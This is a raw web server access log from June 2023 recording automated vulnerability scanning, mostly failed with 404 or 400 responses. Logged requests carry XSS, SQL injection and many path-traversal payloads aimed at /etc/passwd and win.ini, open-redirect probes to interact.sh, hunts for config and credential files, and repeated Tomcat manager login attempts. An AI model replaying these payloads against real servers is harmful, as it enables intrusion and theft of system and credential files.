107.189.31.184 - - [17/Jun/2023:11:33:50 +0530] "GET /behat.yml HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:11:33:51 +0530] "GET /behat.yml.dist HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:33:53 +0530] "GET /behat.yml.dist HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:11:35:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:36:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:36:47 +0530] "GET /index.php?advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype&p=banlist HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:11:36:48 +0530] "GET /index.php?advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype&p=banlist HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:11:38:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:38:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:39:01 +0530] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2RHotw8pm4fnbgUlbujq5C1IXk4.txt HTTP/1.1" 404 1154
107.189.31.184 - - [17/Jun/2023:11:39:02 +0530] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2RHotw8pm4fnbgUlbujq5C1IXk4.txt HTTP/1.1" 404 1154
107.189.31.184 - - [17/Jun/2023:11:39:30 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:11:39:30 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:11:39:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.249.86.144 - - [17/Jun/2023:11:40:53 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:11:40:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
198.98.57.217 - - [17/Jun/2023:11:41:08 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:11:41:55 +0530] "POST /contactus.php HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:11:41:56 +0530] "POST /contactus.php HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:11:44:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:44:53 +0530] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:11:44:54 +0530] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:11:45:16 +0530] "GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:11:45:17 +0530] "GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:11:45:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:47:14 +0530] "GET /images/json HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:11:47:15 +0530] "GET /images/json HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:11:48:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:49:31 +0530] "GET /wp-config.php-backup HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:11:49:31 +0530] "GET /wp-config.php-backup HTTP/1.1" 404 1034
45.128.232.141 - - [17/Jun/2023:11:49:33 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:11:49:33 +0530] "GET /%c0 HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:11:49:34 +0530] "GET /%c0 HTTP/1.1" 404 1000
41.186.73.134 - - [17/Jun/2023:11:49:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:50:25 +0530] "GET /ads/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:50:28 +0530] "GET /adserve/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:11:50:30 +0530] "GET /ads/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:50:31 +0530] "GET /adserver/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:11:50:33 +0530] "GET /openx/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:11:50:33 +0530] "GET /adserve/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:11:50:35 +0530] "GET /revive/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:11:50:35 +0530] "GET /adserver/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:11:50:38 +0530] "GET /www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:11:50:38 +0530] "GET /openx/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:11:50:41 +0530] "GET /revive/www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:11:50:43 +0530] "GET /www/delivery/lg.php?dest=http://interact.sh HTTP/1.1" 404 1032
41.186.73.134 - - [17/Jun/2023:11:53:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:53:20 +0530] "GET /conditions HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:11:53:23 +0530] "GET /conditions HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:11:53:23 +0530] "GET /actuator/conditions HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:11:53:25 +0530] "GET /actuator/conditions HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:11:54:15 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_weberpcustomer HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:11:54:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:54:15 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_weberpcustomer HTTP/1.1" 404 1012
90.151.171.106 - - [17/Jun/2023:11:56:48 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:11:56:49 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:11:56:49 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:11:56:49 +0530] "-" 400 -
193.35.18.51 - - [17/Jun/2023:11:56:50 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:11:56:53 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:11:56:54 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [17/Jun/2023:11:56:54 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:11:56:54 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:11:57:37 +0530] "GET /fpui/jsp/index.jsp HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:11:57:39 +0530] "GET /fpui/jsp/index.jsp HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:11:57:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:58:06 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:58:07 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:58:08 +0530] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:11:58:09 +0530] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 1124
41.186.73.134 - - [17/Jun/2023:11:59:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:59:38 +0530] "POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:11:59:38 +0530] "POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:12:00:35 +0530] "GET /login/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:12:00:35 +0530] "GET /login/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:12:00:39 +0530] "GET /wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:12:00:40 +0530] "GET /wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
198.235.24.53 - - [17/Jun/2023:12:01:14 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:12:02:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:02:33 +0530] "GET /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46bGludXgzMjE=&login=quick HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:12:02:34 +0530] "GET /cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46bGludXgzMjE=&login=quick HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:12:02:56 +0530] "GET /api.php?c=project&f=index&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+&token=1234 HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:12:02:56 +0530] "GET /api.php?c=project&f=index&id=news&sort=1+and+extractvalue(1,concat(0x7e,md5(999999999)))+--+&token=1234 HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:12:03:01 +0530] "GET /admin/elfinder/elfinder-cke.html HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:12:03:03 +0530] "GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:12:03:05 +0530] "GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:12:03:06 +0530] "GET /admin/elfinder/elfinder-cke.html HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:12:03:07 +0530] "GET /assets/elFinder/elfinder.html HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:12:03:08 +0530] "GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:12:03:09 +0530] "GET /backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:12:03:10 +0530] "GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:12:03:11 +0530] "GET /elfinder/elfinder-cke.html HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:12:03:12 +0530] "GET /assets/elFinder/elfinder.html HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:12:03:13 +0530] "GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:12:03:14 +0530] "GET /backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:12:03:15 +0530] "GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:12:03:16 +0530] "GET /elfinder/elfinder-cke.html HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:12:03:17 +0530] "GET /uploads/elfinder/elfinder-cke.html HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:12:03:18 +0530] "GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:12:03:20 +0530] "GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:12:03:22 +0530] "GET /uploads/elfinder/elfinder-cke.html HTTP/1.1" 404 1062
41.186.73.134 - - [17/Jun/2023:12:03:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:06:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:07:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:07:54 +0530] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:12:07:55 +0530] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:12:07:56 +0530] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:12:07:57 +0530] "POST /fileDownload?action=downloadBackupFile HTTP/1.1" 404 1018
87.120.88.59 - - [17/Jun/2023:12:08:27 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:09:21 +0530] "POST /http/index.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:12:09:22 +0530] "POST /http/index.php HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:12:11:01 +0530] "GET /Admin/frmWelcome.aspx HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:12:11:02 +0530] "GET /Admin/frmWelcome.aspx HTTP/1.1" 404 1036
41.186.73.134 - - [17/Jun/2023:12:11:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:11:15 +0530] "POST /admin/uploads.php?id=1 HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:11:15 +0530] "POST /admin/uploads.php?id=1 HTTP/1.1" 404 1028
192.155.90.220 - - [17/Jun/2023:12:11:32 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:12:12:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:14:24 +0530] "GET /dashboard.html HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:12:14:24 +0530] "GET /dashboard.html HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:12:15:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:16:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:17:10 +0530] "GET /.badarg.log HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:12:17:10 +0530] "GET /.badarg.log HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:12:17:51 +0530] "GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:12:17:52 +0530] "GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1" 404 1062
41.186.73.134 - - [17/Jun/2023:12:19:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:21:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
146.190.119.114 - - [17/Jun/2023:12:21:16 +0530] "GET /aaa9 HTTP/1.1" 404 1002
146.190.119.114 - - [17/Jun/2023:12:21:29 +0530] "GET /aab8 HTTP/1.1" 404 1002
146.190.119.114 - - [17/Jun/2023:12:21:38 +0530] "GET / HTTP/1.1" 200 11250
92.204.128.155 - - [17/Jun/2023:12:21:41 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:21:50 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jinventory HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:21:51 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jinventory HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:12:24:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:25:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:27:17 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:27:18 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:27:20 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:27:20 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:12:28:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:29:00 +0530] "GET /database_credentials.inc HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:12:29:00 +0530] "GET /database_credentials.inc HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:12:29:19 +0530] "GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:12:29:20 +0530] "GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1" 404 1048
41.186.73.134 - - [17/Jun/2023:12:29:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:30:32 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:30:32 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:12:32:08 +0530] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:12:32:08 +0530] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:12:32:14 +0530] "POST /logIn HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:12:32:15 +0530] "POST /logIn HTTP/1.1" 404 1004
41.186.73.134 - - [17/Jun/2023:12:32:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:12:34:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:34:14 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_fabrik HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:34:14 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_fabrik HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:12:37:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:37:45 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:12:37:46 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
41.186.73.134 - - [17/Jun/2023:12:38:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:12:38:31 +0530] "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:12:38:34 +0530] "GET /./../../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:35 +0530] "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:12:38:37 +0530] "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:39 +0530] "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:12:38:41 +0530] "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:43 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 404 1232
107.189.31.184 - - [17/Jun/2023:12:38:45 +0530] "GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:38:47 +0530] "GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:38:49 +0530] "GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:38:51 +0530] "GET /..///////..////..//////windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:53 +0530] "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:55 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:12:38:57 +0530] "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:12:38:57 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:59 +0530] "GET /./../../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:38:59 +0530] "GET /index.php?page=windows/win.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:01 +0530] "GET /index.php?page=windows/win.ini%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:01 +0530] "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:12:39:04 +0530] "GET /index.php?page=../../windows/win.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:04 +0530] "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:06 +0530] "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1" 404 1120
107.189.31.184 - - [17/Jun/2023:12:39:06 +0530] "GET /index.php?page=....//....//windows/win.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:08 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:08 +0530] "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:08 +0530] "GET /.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:09 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:10 +0530] "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1" 404 1234
107.189.31.184 - - [17/Jun/2023:12:39:10 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 404 1232
107.189.31.184 - - [17/Jun/2023:12:39:12 +0530] "GET /../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:13 +0530] "GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:39:14 +0530] "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 404 1188
107.189.31.184 - - [17/Jun/2023:12:39:15 +0530] "GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:39:17 +0530] "GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:12:39:19 +0530] "GET /..///////..////..//////windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:21 +0530] "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:23 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:12:39:25 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:27 +0530] "GET /index.php?page=windows/win.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:29 +0530] "GET /index.php?page=windows/win.ini%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:31 +0530] "GET /index.php?page=../../windows/win.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:33 +0530] "GET /index.php?page=....//....//windows/win.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:12:39:35 +0530] "GET /.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:12:39:37 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:12:39:37 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:12:39:37 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:12:39:37 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:38 +0530] "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1" 404 1234
107.189.31.184 - - [17/Jun/2023:12:39:40 +0530] "GET /../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:12:39:42 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:12:39:42 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:12:39:42 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:12:39:42 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:12:39:42 +0530] "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 404 1188
41.186.73.134 - - [17/Jun/2023:12:41:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
